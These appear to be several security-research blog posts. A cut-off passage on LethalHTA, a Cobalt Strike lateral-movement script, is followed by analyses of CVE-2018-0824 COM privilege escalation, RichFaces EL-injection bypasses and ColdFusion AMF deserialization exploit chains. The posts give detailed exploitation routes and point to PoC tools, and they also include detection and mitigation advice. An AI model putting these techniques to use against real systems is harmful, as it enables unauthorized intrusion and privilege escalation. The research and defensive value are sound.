To easily use this technique in our day-to-day work, we created a Cobalt Strike Aggressor Script called LethalHTA.cna. It integrates the .NET implementation (LethalHTADotNet) into Cobalt Strike by providing two distinct lateral movement methods in the GUI, named HTA PowerShell Delivery (staged - x86) and HTA .NET In-Memory Delivery (stageless - x86/x64 dynamic).

The HTA PowerShell Delivery method executes a PowerShell-based, staged beacon on the target system. Since the PowerShell beacon is staged, the target system needs to be able to reach the HTTP(S) host and the TeamServer (which are in most cases the same system).

The HTA .NET In-Memory Delivery takes the technique a step further by implementing a memory-only solution that provides far more flexibility in terms of payload delivery and stealth. Using this option, it is possible to tunnel the HTA delivery/retrieval through the beacon and also to specify a proxy server. If the target system is not able to reach the TeamServer or any other Internet-connected system, an SMB listener can be used instead. This makes it possible to reach systems deep inside the network by bootstrapping an SMB beacon on the target and connecting to it via a named pipe from one of the internal beacons.

Due to the techniques used, everything is done within the mshta.exe process without creating additional processes.

The combination of two techniques, in addition to the HTA attack vector described above, is used to execute everything in memory. Utilizing DotNetToJScript, we are able to load a small .NET class (SCLoader) that dynamically determines the process architecture (x86 or x64) and then executes the included stageless beacon shellcode. This technique can also be reused in other scenarios where it is not apparent before exploitation which architecture is in use.

For a detailed explanation of the steps involved visit our GitHub Project.

Detection

To detect our technique you can watch for files inside the INetCache (%windir%\[System32 or SysWOW64]\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\) folder containing "ActiveXObject". This is due to mshta.exe caching the payload file. Furthermore it can be detected by an mshta.exe process spawned by svchost.exe.

Marshalling to SYSTEM - An analysis of CVE-2018-0824

By: Unknown
15 June 2018 at 13:19
In May 2018 Microsoft patched an interesting vulnerability (CVE-2018-0824) which was reported by Nicolas Joly of Microsoft's MSRC:
A remote code execution vulnerability exists in "Microsoft COM for Windows" when it fails to properly handle serialized objects. An attacker who successfully exploited the vulnerability could use a specially crafted file or script to perform actions. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. In a web-based attack scenario, an attacker could host a website (or leverage a compromised website that accepts or hosts user-provided content) that contains a specially crafted file that is designed to exploit the vulnerability. However, an attacker would have no way to force the user to visit the website. Instead, an attacker would have to convince the user to click a link, typically by way of an enticement in an email or Instant Messenger message, and then convince the user to open the specially crafted file. The security update addresses the vulnerability by correcting how "Microsoft COM for Windows" handles serialized objects.
The keywords "COM" and "serialized" pretty much jumped into my face when the advisory came out. Since I had already spent several months of research time on Microsoft COM last year I decided to look into it. Although the vulnerability can result in remote code execution, I'm only interested in the privilege escalation aspects.

Before I go into details I want to give you a quick introduction into COM and how deserialization/marshalling works. As I'm far from being an expert on COM, all this information is either based on the great book "Essential COM" by Don Box or the awesome Infiltrate '17 Talk "COM in 60 seconds". I have skipped several details (IDL/MIDL, Apartments, Standard Marshalling, etc.) just to keep the introduction short.

Introduction to COM and Marshalling

COM (Component Object Model) is a Windows middleware whose primary goal is reusable code (components). In order to make C++ code reusable, Microsoft engineers designed COM in an object-oriented manner with the following key aspects in mind:
  • Portability
  • Encapsulation
  • Polymorphism
  • Separation of interfaces from implementation
  • Object extensibility
  • Resource Management
  • Language independence

COM objects are defined by an interface and implementation class. Both interface and implementation class are identified by a GUID. A COM object can implement several interfaces using inheritance.
All COM objects implement the IUnknown interface which looks like the following class definition in C++:
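Stripped of the calling-convention and SAL macros used in the real declaration in unknwn.h, it essentially boils down to this simplified sketch:

struct IUnknown
{
    virtual HRESULT QueryInterface(REFIID riid, void **ppvObject) = 0;
    virtual ULONG   AddRef() = 0;
    virtual ULONG   Release() = 0;
};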

The QueryInterface() method is used to cast a COM object to a different interface implemented by the COM object. The AddRef() and Release() methods are used for reference counting.

Just to keep it short I rather go on with an existing COM object instead of creating an artificial example COM object. A Control Panel COM object is identified by the GUID {06622D85-6856-4460-8DE1-A81921B41C4B}. To find out more about the COM object we could analyze the registry manually or just use the great tool "OleView .NET".

The "Control Panel" COM object implements several interfaces as we can see in the screenshot of OleView .NET: The implementation class of the COM object (COpenControlPanel) can be found in shell32.dll. To open a "Control Panel" programmatically we make use of the COM API:
  • In line 6 we initialize the COM environment
  • In line 7 we create an instance of a "Control Panel" object
  • In line 8 we cast the instance to the IOpenControlPanel interface
  • In line 9 we open the "Control Panel" by calling the "Open" method
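
The original listing is not shown verbatim, but a minimal sketch of these four steps could look like this (error handling omitted, variable names are ours):

#include <windows.h>
#include <shobjidl.h>

int main()
{
    CoInitialize(NULL);                                   // initialize the COM environment

    CLSID clsid;
    CLSIDFromString(L"{06622D85-6856-4460-8DE1-A81921B41C4B}", &clsid);

    IUnknown *pUnk = NULL;
    CoCreateInstance(clsid, NULL, CLSCTX_ALL,             // create the "Control Panel" object
                     __uuidof(IUnknown), (void **)&pUnk);

    IOpenControlPanel *pPanel = NULL;
    pUnk->QueryInterface(__uuidof(IOpenControlPanel),     // cast to IOpenControlPanel
                         (void **)&pPanel);

    pPanel->Open(NULL, NULL, NULL);                       // open the Control Panel
    return 0;
}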
Inspecting the COM object in the debugger after running up to the Open() call shows us the virtual function table (vTable) of the object:

The function pointers in the vTable of the object point to the actual implementation functions in shell32.dll. The reason for that is that the COM object was created as a so called InProc server which means that shell32.dll got loaded into the current process address space. When passing CLSCTX_ALL, CoCreateInstance() tries to create an InProc server first. If it fails, other activation methods are tried (see CLSCTX enumeration).

By changing the CLSCTX_ALL parameter of CoCreateInstance() to CLSCTX_LOCAL_SERVER and running the program again, we notice some differences: the vTable of the object now contains function pointers from OneCoreUAPCommonProxyStub.dll, and the 4th function pointer, which corresponds to the Open() method, now points to OneCoreUAPCommonProxyStub!ObjectStublessClient3().

The reason for that is that we created the COM object as an out-of-process server. The following diagram tries to give you an architectural overview (shamelessly borrowed from Project Zero):

The function pointers in the COM object point to functions of the proxy class. When we execute the IOpenControlPanel::Open() method, the method OneCoreUAPCommonProxyStub!ObjectStublessClient3() gets called on the proxy. The proxy class itself eventually calls RPC methods (e.g. RPCRT4!NdrpClientCall3) to send the parameters to the RPC server in the out-of-process server. The parameters need to get serialized/marshalled to be sent over RPC. In the out-of-process server the parameters get deserialized/unmarshalled and the stub invokes shell32!COpenControlPanel::Open(). For non-complex parameters like strings the serialization/marshalling is trivial as these are sent by value.

How about complex parameters like COM objects? As we can see from the method definition of IOpenControlPanel::Open() the third parameter is a pointer to an IUnknown COM object:
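Simplified, the declaration from shobjidl.h reads:

// IOpenControlPanel::Open(), simplified:
HRESULT Open(LPCWSTR pszName, LPCWSTR pszPage, IUnknown *punkSite);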
The answer is that a complex object can either get marshalled by reference (standard marshalling) or the serialization/marshalling logic can be customized by implementing the IMarshal interface (custom marshalling).

The IMarshal interface has a few methods as we can see in the following definition:
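Simplified (the real declaration lives in objidl.h):

struct IMarshal : public IUnknown
{
    virtual HRESULT GetUnmarshalClass(REFIID riid, void *pv, DWORD dwDestContext,
                                      void *pvDestContext, DWORD mshlflags, CLSID *pCid) = 0;
    virtual HRESULT GetMarshalSizeMax(REFIID riid, void *pv, DWORD dwDestContext,
                                      void *pvDestContext, DWORD mshlflags, DWORD *pSize) = 0;
    virtual HRESULT MarshalInterface(IStream *pStm, REFIID riid, void *pv, DWORD dwDestContext,
                                     void *pvDestContext, DWORD mshlflags) = 0;
    virtual HRESULT UnmarshalInterface(IStream *pStm, REFIID riid, void **ppv) = 0;
    virtual HRESULT ReleaseMarshalData(IStream *pStm) = 0;
    virtual HRESULT DisconnectObject(DWORD dwReserved) = 0;
};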
During serialization/marshalling of a COM object, the IMarshal::GetUnmarshalClass() method gets called by the COM runtime and returns the GUID of the class to be used for unmarshalling. Then the method IMarshal::GetMarshalSizeMax() is called to prepare a buffer for the marshalling data. Finally the IMarshal::MarshalInterface() method is called, which writes the custom marshalling data to the IStream object. The COM runtime sends the GUID of the "Unmarshal class" and the IStream object via RPC to the server.

On the server, the COM runtime creates the "Unmarshal class" using the CoCreateInstance() function, casts it to the IMarshal interface using QueryInterface and eventually invokes the IMarshal::UnmarshalInterface() method on the "Unmarshal class" instance, passing the IStream as a parameter.

And that's also where all the misery starts ...

Diffing the patch

After downloading the patch for Windows 8.1 x64 and extracting the files, I found two patched DLLs related to Microsoft COM:
  • oleaut32.dll
  • comsvcs.dll
Using Hex-Rays' IDA Pro and Joxean Koret's Diaphora I analyzed the changes made by Microsoft.
In oleaut32.dll several functions were changed, but nothing special related to deserialization/marshalling:


In comsvcs.dll only four functions were changed:


Clearly, one method stood out: CMarshalInterceptor::UnmarshalInterface().

The method CMarshalInterceptor::UnmarshalInterface() is the implementation of the UnmarshalInterface() method of the IMarshal interface. As we already know from the introduction this method gets called during unmarshalling.

The bug

Further analysis was done on Windows 10 Redstone 4 (1803) including March patches (ISO from MSDN). In the very beginning of the method CMarshalInterceptor::UnmarshalInterface() 20 bytes are read from the IStream object into a buffer on the stack.

Later the bytes in the buffer are compared against the GUID of the CMarshalInterceptor class (ECABAFCB-7F19-11D2-978E-0000F8757E2A). If the bytes in the stream match we reach the function CMarshalInterceptor::CreateRecorder().


In the function CMarshalInterceptor::CreateRecorder() the COM-API function ReadClassStm() is called. This function reads a CLSID (GUID) from the IStream and stores it in a buffer on the stack. Then the CLSID gets compared against the GUID of a CompositeMoniker.
If you followed the various Moniker "vulnerabilities" in 2016/17 (URL Moniker, Script Moniker, SOAP Moniker), you know that Monikers are definitely something you want to find in code you might be able to trigger.

The IMoniker interface inherits from IPersistStream which allows a COM object implementing it to load/save itself from/to an IStream object. Monikers identify objects uniquely and can locate, activate and get a reference to the object by calling the BindToObject() method of the IMoniker instance.

If the CLSID doesn't match the GUID of the CompositeMoniker we follow the path to the right. Here, the COM-API function CoCreateInstance() is called with the CLSID read from the IStream as the first parameter. If COM finds the specific class and is able to cast it to an IMoniker interface we reach the next basic block. Next, the IPersistStream::Load() method is called on the newly created instance, which restores the saved Moniker state from the IStream object.

And finally we reach the call to BindToObject() which triggers all evil ...

Exploiting the bug

For exploitation I'm following the same approach as described in the bug tracker issue "DCOM DCE/RPC Local NTLM Reflection Elevation of Privilege" by Project Zero.
I'm creating a fake COM Object class which implements the IStorage and IMarshal interfaces.

All implementation methods for the IStorage interface will be forwarded to a real IStorage instance as we will see later. Since we are implementing custom marshalling, the COM runtime wants to know which class will be used to deserialize/unmarshal our fake object. Therefore the COM runtime calls IMarshal::GetUnmarshalClass(). To trigger the Moniker, we just need to return the GUID of the "QC Marshal Interceptor Class" class (ECABAFCB-7F19-11D2-978E-0000F8757E2A).
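
In a C++ fake object this boils down to something like the following sketch (class and member names are ours):

static const CLSID CLSID_QCMarshalInterceptor =
    { 0xECABAFCB, 0x7F19, 0x11D2, { 0x97, 0x8E, 0x00, 0x00, 0xF8, 0x75, 0x7E, 0x2A } };

HRESULT STDMETHODCALLTYPE FakeObject::GetUnmarshalClass(REFIID riid, void *pv,
    DWORD dwDestContext, void *pvDestContext, DWORD mshlflags, CLSID *pCid)
{
    // Tell the COM runtime to use comsvcs!CMarshalInterceptor on the server side.
    *pCid = CLSID_QCMarshalInterceptor;
    return S_OK;
}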

The final step is to implement the IMarshal::MarshalInterface() method. As you already know the method gets called by the COM runtime to marshal an object into an IStream.
To trigger the call to IMoniker::BindToObject(), we only need to write the required bytes to the IStream object to satisfy all conditions in CMarshalInterceptor::UnmarshalInterface().

I tried to create a Script Moniker COM object with CLSID {06290BD3-48AA-11D2-8432-006008C3FBFC} using CoCreateInstance(). But hey, I got a "REGDB_E_CLASSNOTREG" error code. Looks like Microsoft introduced some changes. Apparently, the Script Moniker wouldn't work anymore. So I thought of exploiting the bug using the "URLMoniker/hta file". But luckily I remembered that in the method CMarshalInterceptor::CreateRecorder() we had a check for a CompositeMoniker CLSID.

So following the left path, we have a basic block in which 4 bytes are read from the stream into the stack buffer (var_78). Next we have a call to CMarshalInterceptor::LoadAndCompose() with the IStream, a pointer to an IMoniker interface pointer and the value from the stack buffer as parameters.

In this method an IMoniker instance is read and created from the IStream using the OleLoadFromStream() COM-API function. Later in the method, CMarshalInterceptor::LoadAndCompose() is called recursively to compose a CompositeMoniker. By invoking IMoniker::ComposeWith() a new IMoniker is created being a composition of two monikers. The pointer to the new CompositeMoniker will be stored in the pointer which was passed to the current function as parameter. As we have seen in one of the previous screenshots the BindToObject() method will be called on the CompositeMoniker later on.

As I remembered from Haifei Li's blog post there was a way to create a Script Moniker by composing a File Moniker and a New Moniker. Armed with that knowledge I implemented the final part of the IMarshal::MarshalInterface() method.

I placed an SCT file at "c:\temp\poc.sct" which runs notepad from an ActiveXObject. Then I tried BITS as a target server first, which didn't work.

Using OleView .NET I found out that BITS doesn't support custom marshalling (see EOAC_NO_CUSTOM_MARSHAL). But the SearchIndexer service with CLSID {06622d85-6856-4460-8de1-a81921b41c4b} was running as SYSTEM and allowed custom marshalling.
So I created a PoC which has the following main() function.

The call to CoGetInstanceFromIStorage() will activate the target COM server and trigger the serialization of the FakeObject instance. Since the COM-API function requires an IStorage as a parameter, we had to implement the IStorage interface in our FakeObject class.
After running the POC we finally have a "notepad.exe" running as SYSTEM.


The POC can be found on our github.

The patch

Microsoft is now checking a flag read from the Thread-local storage. The flag is set in a different method not related to marshalling. If the flag isn't set, the function CMarshalInterceptor::UnmarshalInterface() will exit early without reading anything from the IStream.

Takeaways

Serialization/Unmarshalling without validating the input is bad. That's for sure.
Although this blog post only covers the privilege escalation aspect, the vulnerability can also be triggered from Microsoft Office or by an ActiveX control running in the browser. But I will leave this as an exercise for the reader :-)

Poor RichFaces

30 May 2018 at 13:00

RichFaces is one of the most popular component libraries for JavaServer Faces (JSF). In the past, two vulnerabilities (CVE-2013-2165 and CVE-2015-0279) have been found that allow RCE in versions 3.x ≤ 3.3.3 and 4.x ≤ 4.5.3. Code White discovered two new vulnerabilities which bypass the implemented mitigations. Thereby, all RichFaces versions including the latest 3.3.4 and 4.5.17 are vulnerable to RCE.

Introduction

JavaServer Faces (JSF) is a framework for building user interfaces for web applications. While there are only two major JSF implementations (i. e., Apache MyFaces and Oracle Mojarra), there are several component libraries, which provide additional UI components and features. RichFaces is one of the most popular libraries among these component libraries and since it became part of JBoss (and thereby also part of Red Hat), it is also part of several JBoss/Red Hat products, for example JBoss EAP and JBoss Portal.[1]

RichFaces has three major version branches: 3.x, 4.x, and 5.x. However, as 5.x has never left alpha state, it is rather irrelevant. In early 2016, the developers of RichFaces announced the end-of-life of RichFaces in June 2016. The latest releases of the respective branches are 3.3.4 and 4.5.17.

The Past

In the past, two significant vulnerabilities have been discovered by Takeshi Terada of MBSD, which both affect various RichFaces versions:

CVE-2013-2165: Arbitrary Java Deserialization in RichFaces 3.x ≤ 3.3.3 and 4.x ≤ 4.3.2
Deserialization of arbitrary Java serialized object streams in org.ajax4jsf.resource.ResourceBuilderImpl allows remote code execution.
CVE-2015-0279: Arbitrary EL Evaluation in RichFaces 4.x ≤ 4.5.3 (RF-13977)
Injection of arbitrary EL method expressions in org.richfaces.resource.MediaOutputResource allows remote code execution.

Both vulnerabilities rely on the feature to generate images, video, sounds, and other resources on the fly based on data provided in the request. The provided data is either interpreted as a plain array of bytes or as a Java serialized object stream. In RichFaces 3.x, the data gets appended to the URL path preceded by either /DATB/ (byte array) or /DATA/ (Java serialized object stream); in RichFaces 4.x, the data is transmitted in a request parameter named db (byte array) or do (Java serialized object stream). In all cases, the binary data is compressed using DEFLATE and then encoded using a URL-safe Base64 encoding.

CVE-2013-2165: Arbitrary Java Deserialization

This vulnerability is a straightforward Java deserialization vulnerability. When a RichFaces 3.x resource is requested, it eventually gets processed by ResourceBuilderImpl.getResourceDataForKey(String). If the requested resource key begins with /DATA/, the remaining data gets decoded and decompressed (using ResourceBuilderImpl.decrypt(byte[]), which actually, despite its name, does not incorporate encryption[2]) and finally deserialized without any further validation.

In RichFaces 4.x, it is basically the same: the org.richfaces.resource.DefaultCodecResourceRequestData holds the request data passed via db/do and Util.decodeObjectData(String) is used in the latter case. That method then decodes and decompresses the data in a similar way and finally deserializes it without any further validation.

This can be exploited with ysoserial using a suitable gadget.

The arbitrary Java deserialization was patched in RichFaces 3.3.4 and 4.3.3 by introducing look-ahead deserialization with a limited set of whitelisted classes.[3] Due to several aftereffects, the list was extended occasionally.[4]

CVE-2015-0279: Arbitrary EL Evaluation

The RichFaces issue RF-13977 corresponding to this vulnerability is public and actually quite detailed. It describes that the RichFaces Showcase application utilizes the MediaOutputResource dynamic resource builder. The data object passed in the do URL parameter holds the state object, which is used by MediaOutputResource.restoreState(FacesContext, Object) to restore its state. This includes the contentProducer field, which is expected to be a MethodExpression object. That MethodExpression later gets invoked by MediaOutputResource.encode(FacesContext) to pass execution to the referenced method to generate the resource's contents. In the mentioned example, the EL method expression #{mediaBean.process} references the process method of a Java Bean named mediaBean.

Now the problem with that is that the EL expression can be changed, even just with basic Linux utilities. There is no protection in place that would prevent one from tampering with it. Depending on the EL implementation, this allows arbitrary code execution, as demonstrated by the reporter:

However, exploiting this vulnerability is not always that easy, especially if there is no existing sample of a valid do state object that can be tampered with. If one wanted to create the state object from scratch, it would require compatible libraries, otherwise the deserialization may fail. Moreover, not every EL implementation allows arbitrary expressions with parameterized invocations in method expressions, as this was only added in EL 2.2. EL exploitation is quite an interesting topic in itself.

The patch for this issue introduced in RichFaces 4.5.4 was to check whether the contentProducer expression contains parentheses. This prevents the invocation of methods with parameters like loadClass("java.lang.Runtime").

The Present

The nature of the past vulnerabilities led to the assumption that there may be a way to bypass the mitigations. And indeed, after some research, two ways were found to gain remote code execution in a similar manner, also affecting the latest RichFaces versions 3.3.4 and 4.5.17:

RF-14310: Arbitrary EL Evaluation in RichFaces 3.x ≤ 3.3.4
Injection of arbitrary EL expressions allows remote code execution via org.richfaces.renderkit.html.Paint2DResource.
RF-14309: Arbitrary EL Evaluation in RichFaces 4.5.3 ≤ 4.5.17
Injection of arbitrary EL variable mapper allows to bypass mitigation of CVE-2015-0279 and thereby remote code execution.

Although the issues RF-14309 and RF-14310 were discovered in the order of their identifier, we'll explain them in the opposite order. Also note that the issues are not public but only visible to persons responsible to resolve security issues.

RF-14310: Arbitrary EL Evaluation

This vulnerability is very similar to CVE-2015-0279/RF-13977. While the injection of arbitrary EL expressions was possible right from the beginning, there is always a need to get them triggered somehow. Such a trigger was found in the org.richfaces.renderkit.html.Paint2DResource class. When a resource of that type gets requested, its send(ResourceContext) method gets called. The resource data transmitted in the request must be an org.richfaces.renderkit.html.Paint2DResource$ImageData object. This passes the whitelisting as ImageData extends org.ajax4jsf.resource.SerializableResource, which was actually introduced in 3.3.4 to fix the Java deserialization vulnerability.

RF-14309: Arbitrary EL Evaluation

As the patch to CVE-2015-0279 introduced in 4.5.4 disallowed the use of parentheses in the EL method expression of the contentProducer, it seemed like a dead end. But if you are familiar with EL internals, you know that EL expressions can have custom function mappers and variable mappers, which are used by the ELResolver to resolve functions (i. e., name in ${prefix:name()}) and variables (i. e., var in ${var.property}) to Method and ValueExpression instances, respectively. Fortunately, various VariableMapper implementations were added to the whitelist starting with 4.5.3.[5]

So to exploit this, all that is needed is to use a variable in the contentProducer method expression like ${dummy.toString} and add an appropriate VariableMapper to the method expression that maps dummy to a ValueExpression of your choice.

The Future

RichFaces has reached its end-of-life in June 2016 and their RichFaces End-Of-Life Questions & Answers is pretty clear on the time thereafter:

What will happen if a serious bug or security issue is discovered in the future?

There will be no patches after the end of support. In case of discovering a serious issue you will have to develop a patch yourself or switch to another framework.

RichFaces End-Of-Life Questions & Answers

So we can't expect official patches.

The Bonus

While looking for ways to exploit the recent versions of RichFaces, there were two classes in the JSF API 2.0 and later, which seemed promising:

The interesting thing about these classes is that they have an equals(Object) method, which eventually calls getType(ELContext) on an EL value expression. For example, if equals(Object) gets called on a ValueExpressionValueBindingAdapter object with a ValueExpression object as other, getType(ELContext) of other gets called. And as the value expression has to be evaluated to determine its resulting type, this can be used as a Java deserialization primitive to execute EL value expressions on deserialization.

This is very similar to the Myfaces1 and Myfaces2 gadgets in ysoserial.[6] However, while they require Apache MyFaces, this one is independent from the JSF implementation and only requires a matching EL implementation.

Unfortunately, this gadget does not work for RichFaces. The reason for that is that ValueExpressionValueBindingAdapter needs to have a valid value binding as getType(ELContext) gets called first. But javax.faces.el.ValueBinding is not whitelisted. And wrapping it in a StateHolderSaver does not work because the state object is of type Object[] and therefore the cast to Serializable[] in StateHolderSaver.restore(FacesContext) fails.[7] This is probably a bug in RichFaces as Serializable[] is not whitelisted either although StateHolderSaver uses Serializable[] internally on StateHolder instances.

Conclusion

It has been shown that all RichFaces versions 3.x and 4.x including the latest 3.3.4 and 4.5.17 are exploitable by one or multiple vulnerabilities:

  • RichFaces 3
    • 3.1.0 ≤ 3.3.3: CVE-2013-2165
    • 3.1.0 ≤ 3.3.4: RF-14310
  • RichFaces 4
    • 4.0.0 ≤ 4.3.2: CVE-2013-2165
    • 4.0.0 ≤ 4.5.4: CVE-2015-0279
    • 4.5.3 ≤ 4.5.17: RF-14309

As we can't expect official patches, one way to mitigate all these vulnerabilities is to block requests to the concerned URLs:

  • Blocking requests of URLs with paths containing /DATA/ should mitigate CVE-2013-2165 and RF-14310.
  • Blocking requests of URLs with paths containing org.richfaces.resource.MediaOutputResource (literally or URL encoded) should mitigate CVE-2015-0279 and RF-14309.

Exploiting Adobe ColdFusion before CVE-2017-3066

By: Unknown
13 March 2018 at 14:41
In a recent penetration test my teammate Thomas came across several servers running Adobe ColdFusion 11 and 12. Some of them were vulnerable to CVE-2017-3066 but no outgoing TCP connections were possible to exploit the vulnerability. He asked me whether I had an idea how he could still get a SYSTEM shell and the outcome of the short research effort is documented here.

Introduction Adobe ColdFusion & AMF

Before we go into technical details, I will give you a short intro to Adobe ColdFusion (CF). Adobe ColdFusion is an application development platform like ASP.NET, albeit several years older. It allows a developer to build websites, SOAP and REST web services, and to interact with Adobe Flash using the Action Message Format (AMF).

The AMF protocol is a custom binary serialization protocol. It has two formats, AMF0 and AMF3. An Action Message consists of headers and bodies. Several data types are supported in AMF0 and AMF3; the AMF3 format, for example, supports protocol elements such as undefined, null, boolean, integer, double, string, date, array and object, each identified by a type marker.
Details about the binary message formats of AMF0 and AMF3 can be found on Wikipedia (see https://en.wikipedia.org/wiki/Action_Message_Format).
There are several implementations for AMF in different languages. For Java we have Adobe BlazeDS (now Apache BlazeDS), which is also used in Adobe ColdFusion.
The BlazeDS AMF serializer can serialize complex object graphs. The serializer starts with the root object and serializes its members recursively.
Two general serialization techniques are supported by BlazeDS to serialize complex objects:
  1. Serialization of Bean Properties (AMF0 and AMF3)
  2. Serialization using Java's java.io.Externalizable interface. (AMF3)

Serialization of Bean Properties

This technique requires the object to be serialized to have a public no-arg constructor and public getter and setter methods for every member (JavaBeans convention).
In order to collect all member values of an object, the AMF serializer invokes all getter methods during serialization. The member names and values are put into the Action Message body together with the class name of the object.
During deserialization, the class name is taken from the Action Message, a new object is constructed, and for every member name the corresponding setter method is called with the value as argument. This all happens either in the method readScriptObject() of class flex.messaging.io.amf.Amf3Input or in readObjectValue() of class flex.messaging.io.amf.Amf0Input.

Serialization using Java's java.io.Externalizable interface

BlazeDS further supports serialization of complex objects of classes implementing the java.io.Externalizable interface which inherits from java.io.Serializable.
Every class implementing this interface needs to provide its own logic to deserialize itself by calling methods on the java.io.ObjectInput-implementation to read serialized primitive types and Strings (e.g. method read(byte[] paramArrayOfByte)).
During deserialization of an object (type 0xa) in AMF3, the method readScriptObject() of class flex.messaging.io.amf.Amf3Input gets called. In line #759 the method readExternalizable is invoked which calls the readExternal() method on the object to be deserialized.

This should be sufficient to serve as an introduction to Adobe ColdFusion and AMF.

Previous work

Chris Gates (@Carnal0wnage) published the paper ColdFusion for Pentesters which is an excellent introduction to Adobe ColdFusion.
Wouter Coekaerts (@WouterCoekaerts) already showed in his blog post that deserializing untrusted AMF data is dangerous.
Looking at the history of Adobe ColdFusion vulnerabilities in Flexera/Secunia's database, you find mostly XSS, XXE and information disclosure issues.
The most recent ones are:
  • Deserialization of untrusted data over RMI (CVE-2017-11283/4 by @nickstadb)
  • XXE (CVE-2017-11286 by Daniel Lawson of @depthsecurity)
  • XXE (CVE-2016-4264 by @dawid_golunski)

CVE-2017-3066

In 2017 Moritz Bechler of AgNO3 GmbH and my teammate Markus Wulftange independently discovered the vulnerability CVE-2017-3066 in Apache BlazeDS.
The core problem of this vulnerability was that Adobe ColdFusion never did any whitelisting of allowed classes. Thus any class on the classpath of Adobe ColdFusion which either fulfills the JavaBeans convention or implements java.io.Externalizable could be sent to the server and get deserialized. Both Moritz and Markus found JRE classes (sun.rmi.server.UnicastRef2 and sun.rmi.server.UnicastRef) which implement the java.io.Externalizable interface and trigger an outgoing TCP connection during AMF3 deserialization. After the connection to the attacker's server was made, its response was deserialized using Java's native deserialization via ObjectInputStream.readObject(). Both had found a great "bridge" from AMF deserialization to Java's native deserialization, which offers well-known exploitation primitives using public gadgets. Details about the vulnerability can also be found in Markus' blog post.
Apache introduced validation through the class flex.messaging.validators.ClassDeserializationValidator. It has a default whitelist but can also be configured with a configuration file. For details see the Apache BlazeDS release notes.

Finding exploitation primitives before CVE-2017-3066

As already mentioned in the very beginning my teammate Thomas required an exploit which also works without outgoing connection.
I had a quick look into the excellent research paper "Java Unmarshaller Security" of Moritz Bechler where he analysed several "Unmarshallers" including BlazeDS. The exploitation payloads he discovered weren't applicable since the libraries were missing in the classpath.
So I started with my typical approach and fired up my favorite "reverse engineering tool" when it comes to Java: Eclipse. Eclipse together with the powerful decompiler plugin "JD-Eclipse" (https://github.com/java-decompiler/jd-eclipse) is all you need for static and dynamic analysis. As a former dev I am used to working with IDEs, which make your life easier; decompiling and grepping through code is often very inefficient and error-prone. So I created a new Java project and added all JAR files of Adobe ColdFusion 12 as external libraries.
The first idea was to look for further calls to Java's ObjectInputStream.readObject() method. Using Eclipse this is very easy: just open the class ObjectInputStream, right-click on the readObject() method and click "Open Call Hierarchy". Thanks to JD-Eclipse and its decompiler, Eclipse is able to construct call graphs based on class information without having any source. The call graph looks big in the very beginning, but with some experience you quickly see which nodes in the graph are interesting.
After some hours I found two promising call graphs.

Setter-based Exploit

The first one starts with method setState(byte[] new_state) of class org.jgroups.blocks.ReplicatedTree.



Looking at the implementation of this method, we already can imagine what is happening in line #605. A quick look at the call graph confirms that we eventually end up in a call to ObjectInputStream.readObject().

The only thing to mention here is that the byte[] passed to setState() needs to have an additional byte 0x2 at offset 0x0 as we can see from line 364 of class org.jgroups.util.Util.
The exploit can be found in the following image.

The exploit works against Adobe ColdFusion 12 only since JGroups is only available in this specific version.

Externalizable-based Exploit

The second call graph starts in class org.apache.axis2.util.MetaDataEntry with a call to readExternal which is what we are looking for.

In line #297 we have a call to SafeObjectInputStream.install(inObject).
In this function our AMF3Input instance gets wrapped by a org.apache.axis2.context.externalize.SafeObjectInputStream instance.
In line #341 a new instance of class org.apache.axis2.context.externalize.ObjectInputStreamWithCL is created. This class just extends the standard java.io.ObjectInputStream. In line #342 we finally have our call to readObject().
The following image shows the request for the exploit.


The exploit works against Adobe ColdFusion 11 and 12.

ColdFusionPwn

To make your life easier I created the simple tool ColdFusionPwn. It works on the command line and allows you to generate the serialized AMF message. It incorporates Chris Frohoff's ysoserial for gadget generation. It can be found on our github.

Takeaways

Deserializing untrusted input is bad, that's for sure. From an exploiter's perspective, exploiting deserialization vulnerabilities is a challenging task since you need to find the "right" objects (gadgets) that trigger functionality you can reuse for exploitation. But that also makes it more fun :-)

By the way: If you want to make a deep dive into serverside Java Exploitation and all sorts of deserialization vulnerabilities and how to do proper static and dynamic analysis in Java, you might be interested in our upcoming "Advanced Java Exploitation" course.
